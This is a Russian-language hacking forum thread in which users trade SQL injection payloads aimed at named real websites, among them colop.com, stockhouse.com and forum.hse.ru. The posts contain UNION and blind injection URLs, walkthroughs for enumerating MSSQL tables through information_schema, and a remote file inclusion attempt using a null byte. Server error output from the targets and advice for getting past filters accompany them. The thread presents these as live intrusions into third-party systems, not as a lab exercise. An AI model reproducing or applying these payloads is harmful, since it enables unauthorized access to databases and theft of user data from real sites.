Ваши вопросы по уязвимостям.

http://previous.colop.com/sl/products/colop--printer_dater/product.php?id=-colop:11322000'+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+


Здесь есть SQL-inj?

 

слепая есть =>
http://previous.colop.com/sl/products/colop--printer_oval/product.php?id=colop:13026000'+and+(select substring(version(),1,1))=4/*
если пытаться вывести и первый запрос возращ. фелсе, то ошибка в XML. мб Xpath и SQLinj хз

 

спс прошло, но тут как можно выводит инфо с соседных бд а не с текушего?

http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables)--
выводит таблицу с текушего бд Shdb

 

+where+table_schema=

 

если бы where помогло не писал бы тут((

вот
http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables+where+table_schema='SH_users')--

ADODB.Field error '800a0bcd'

Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

/adredirect.asp, line 25

 

HTML:

group_concat(table_name)+from+infor  mation_schema.tables+where+table_schema!='informat  ion_schema'

HTML:

group_concat(table_name)+from+infor  mation_schema.tables+where+table_schema!='informat  ion_schema'+and+table_name>'здесь имя последней таблицы, которая вывелась в первом запросе'

Либо

HTML:

group_concat(table_name)+from+infor  mation_schema.tables+limit+0,1

и поочередно меняешь limit 0,1 limit 1,1 limit 2,1 и тд.

 

хмм. вроде ругается
Microsoft OLE DB Provider for SQL Server error '80040e14' 'group_concat' is not a recognized built-in function name.
/adredirect.asp, line 23
я уже знаю имена всех бд, но нужные бд не текуший

 

+where+table_schema+not+in+('information_schema')


а так?

 

А, ну так это MSSQL, ясное дело будет ругаться на group_concat

 

спс, как я понял тут нельзя выводит инфо именно с определеной бд(SH_users)

 

ну не будь ленивым,иди дальше и будет твой бд

 

упс , вернее так:
http://www.stockhouse.com/adredirect.asp?sid=%28select/**/top+1+table_name+from+information_schema.tables%20where+table_name+not+in+%28%27MSmerge_tsvw_8BA2514492E34962820230F0E51BEE26%27%29%29--

далее
http://www.stockhouse.com/adredirect.asp?sid=%28select/**/top+1+table_name+from+information_schema.tables%20where+table_name+not+in+%28%27MSmerge_tsvw_8BA2514492E34962820230F0E51BEE26%27,%27MSmerge_log_files%27%29%29--

и т.д

В mssql есть база данных в которой хранится информация о всех таблицах и колонках во всех бд данного сервера

статьи читать надо.

 

ну статьи то читаю просто этот фильтр меня немного перепутал

 

тут какая то неполадка. Я регал мейл kvadimex но не могу найти в базе этот мейл((. Подскажите как делать запрос тут. like '%email%' прошло в поиске таблицы с мейлом но like '%kvadimex%' не работает

 

Можно что-то придумать для такого запроса? $table никак не фильтруется.

Code:

$sql = "REPAIR TABLE {$table}";

 

не могу никак заинклудить (мож его тут и нет...хз)
пробовал и с нулевым байтом и с ? и с расширением и без него...хз в чем дело
http://forum.hse.ru/gold/index.php?t=usrinfo&id=http://site.ru/99.php%00

если тут нет инклуда, то мб что то другое?

 

инклуд в параметре id? nea

 

Code:

http://forum.hse.ru/gold/index.php?t=usrinfo&id=1

и? Еще не надоело писать то, что и без вашего участия уже с такой же ошибкой (читай - кривые руки админа)?

PS: Для начала найдите сайт, которые сразу, без вас, не вываливает мильон ошибок по какой-то ссылке

 

Konqi,Pashkela

то что и без меня есть ошибки я заметил=)
мне интересно могу ли я влиять на бд каким либо образом?

 

тебе нужно бд или инклуд?

инклуд никак не связано с базой